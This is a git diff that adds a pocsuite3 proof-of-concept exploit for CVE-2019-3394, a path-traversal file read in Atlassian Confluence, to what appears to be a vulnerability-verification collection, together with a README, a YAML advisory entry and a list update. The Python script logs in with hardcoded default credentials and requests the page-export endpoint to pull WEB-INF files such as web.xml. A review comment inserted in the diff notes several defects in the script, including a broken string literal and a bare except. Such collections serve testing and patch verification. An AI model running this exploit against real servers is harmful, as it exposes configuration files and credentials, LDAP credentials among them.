diff --git a/cve/confluence/2019/CVE-2019-3394/CVE-2019-3394.py b/cve/confluence/2019/CVE-2019-3394/CVE-2019-3394.py
new file mode 100644
index 0000000000000000000000000000000000000000..15359862ec6ffa42fd53066ed1f1575f0004efdd
--- /dev/null
+++ b/cve/confluence/2019/CVE-2019-3394/CVE-2019-3394.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+from urllib.parse import urlparse
+from pocsuite3.api import requests
+from pocsuite3.api import register_poc
+from pocsuite3.api import Output, POCBase, logger
+from pocsuite3.lib.utils import random_str
+import subprocess
+import base64
+
+
+class TestPOC(POCBase):
+ vulID = '' # 留空即可
+ version = '' # 留空即可
+ author = '' # 留空即可
+ vulDate = ' ' # 漏洞公开的时间,不清楚的可留空
+ cveID = 'CVE-2019-3394' # 该漏洞对应的CVE编号
+ createDate = '' # 留空即可
+ updateDate = '' # 留空即可
+ references = [ # 漏洞的参考链接,可保留空数组 “[]”
+ 'https://github.com/jas502n/CVE-2019-3394'
+ ]
+ name = 'confluence路径穿越漏洞' # POC 名称,支持单行文本
+ appPowerLink = 'https://ofbiz.apache.org/' # 漏洞厂商主页地址
+ appName = 'confluence路径穿越漏洞' # 漏洞应用名称
+ appVersion = '[6.1.0,6.6.16),[6.7.0,6.13.7),[6.14.0,6.15.8)' # 漏洞影响的应用版本
+ vulType = '路径穿越' # 漏洞类型,类型参见《漏洞类型规范表》
+ desc = ''' # 漏洞简要描述,支持多行文本
+ Confluence Server 和 Confluence Data Center 中存在通过页面导出的本地文件泄露漏洞。具有页面编辑权限的攻击者可以利用此漏洞读取服务器上/confluence/WEB-INF目录下的任意文件,其中可能包含用于与其他服务集成的配置文件,可能泄露凭据或其他敏感信息。
+ solution=''漏洞解决方案''' # 漏洞的简要解决方案
+ samples = [] # POC 测试样例(使用本POC可验证成功的漏洞站点URL)
+ install_requires = [] # POC 运行所需要的第三方 Python 模块,建议尽量不要使用第三方模块
+
+
+
+ def _verify(self):
+ result = {}
+ # 请在此处编写漏洞验证相关代码
+ pr = urlparse(self.url)
+ if pr.port:
+ ports = [pr.port]
+ else:
+ ports = [8090]
+ for port in ports:
+ target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
+ burp0_url = target+"/dologin.action"
+ burp0_cookies = {"JSESSIONID": "CA98C2FA809C3F581693A85FC56D8BFE"}
+ burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
+ "Origin": "http://192.168.217.139:8090", "Content-Type": "application/x-www-form-urlencoded",
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+ "Referer": "http://192.168.217.139:8090/dologin.action", "Accept-Encoding": "gzip, deflate",
+ "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
+ burp0_data = {"os_username": "admin", "os_password": "admin123", "os_cookie": "true",
+ "login": "\xe7\x99\xbb\xe5\xbd\x95", "os_destination": "/index.action"}
+
+ my_url = target+"/exportword?pageId=98379"
+ my_headers = {"Upgrade-Insecure-Requests": "1",
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+ "Referer": "http://192.168.217.201:8090/display/TEST/test-3394",
+ "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
+ # requests.get(burp0_url, headers=burp0_headers, cookies=my_cookies)
+
+
+
+ try:
+ response = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,allow_redirects=False)
+ my_cookies = requests.utils.dict_from_cookiejar(response.cookies)
+ print(my_cookies)
+ send_poc = requests.get(my_url,cookies=my_cookies, headers=my_headers, verify=False)
+
+ if send_poc.status_code == 200 and ('web-app xmlns' in send_poc.text and 'Confluence Web App' in send_poc.text):
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = burp0_url
+
+ except:
+ logger.error(f"connect target '{target} failed!'")
+ return self.parse_output(result)
+
+ def _attack(self):
+ return self._verify()
+
+ def parse_output(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('Internet nothing returned')
+ return output
+
+
+register_poc(TestPOC)
diff --git a/cve/confluence/2019/CVE-2019-3394/README.md b/cve/confluence/2019/CVE-2019-3394/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c0d24e870a3456fe89532d24a7ab1f389f5ac316
--- /dev/null
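Review bot: The bare `except:` around the login and export requests swallows every exception, including `KeyboardInterrupt` and ordinary programming errors, and the message it logs has its closing quote misplaced; narrow it to `except requests.RequestException as e:` and log `logger.error(f"connect target '{target}' failed: {e}")`. The `desc = '''` literal is only closed by the `'''` at the end of the `solution=''漏洞解决方案'''` line, so `solution` never becomes a class attribute and its text is swallowed into `desc`. `appPowerLink` still points at ofbiz.apache.org although the POC targets Confluence, and `subprocess`, `base64` and `random_str` are imported but never used. `print(my_cookies)` writes the captured session cookie to stdout where `logger.debug` would keep it out of normal output, and `verify=False` is applied to the export GET but not to the login POST, so an HTTPS target with a self-signed certificate fails at the first request rather than the second.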
+++ b/cve/confluence/2019/CVE-2019-3394/README.md
@@ -0,0 +1,28 @@
+# CVE-2019-3394 Proof-of-Concept
+
+### Overview
+
+There is a local file disclosure vulnerability in the page export function of the Convergence Server and Data Center: a remote attacker with the "Add Page" space permission can read arbitrary files in the/confluence/WEB INF/directory. This directory may contain configuration files for integration with other services, and may disclose authentication credentials, such as LDAP authentication credentials or other sensitive information.
+For a comprehensive understanding, check out the accompanying [blog post](https://blog.csdn.net/zy15667076526/article/details/110721095) for in-depth details.
+
+### Dependencies
+
+* Python 3.6+
+* `pocsuite3` Python Library
+
+### Usage
+
+1. Verify `pocsuite3` is installed:
+```
+pip install pocsuite3
+```
+
+2. Prepare vulnerable server:
+```
+ The vulnerability configuration used in the recurrence process is from https://vulhub.org/#/environments/confluence/CVE-2019-3396/, refer to it to complete the environment construction. Then follow the prompts to create a sample website and administrator account.
+```
+
+3. Run Poc:
+```
+ pocsuite -r CVE-2019-3394.py -u ip:port
+```
\ No newline at end of file
diff --git a/cve/confluence/2019/yaml/CVE-2019-3394.yaml b/cve/confluence/2019/yaml/CVE-2019-3394.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..b79454abc7916761e4f6dc18ed9c4711b1d46a2d
--- /dev/null
+++ b/cve/confluence/2019/yaml/CVE-2019-3394.yaml
@@ -0,0 +1,23 @@
+id: CVE-2019-3394
+source:
+ none
+info:
+ name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。
+ severity: high
+ description: |
+ Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 /confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。
+ scope-of-influence:
+ 6.1.0 <= version < 6.6.16
+ 6.7.0 <= version < 6.13.7
+ 6.14.0 <= version < 6.15.8
+ reference:
+ - https://confluence.atlassian.com/x/uAsvOg
+ - https://jira.atlassian.com/browse/CONFSERVER-58734
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-3394
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags: 任意文件读取
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a8b7367b6465e9d0e9c24f102c47dfafcf732cc..8ec6e5c2e71b9be100d9cf94fbf88373fccc0751 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -54,6 +54,7 @@ cve:
 - CVE-2022-2185
 - CVE-2022-2884
 confluence:
+ - CVE-2019-3394
 - CVE-2019-3396
 - CVE-2021-26084
 - CVE-2022-26134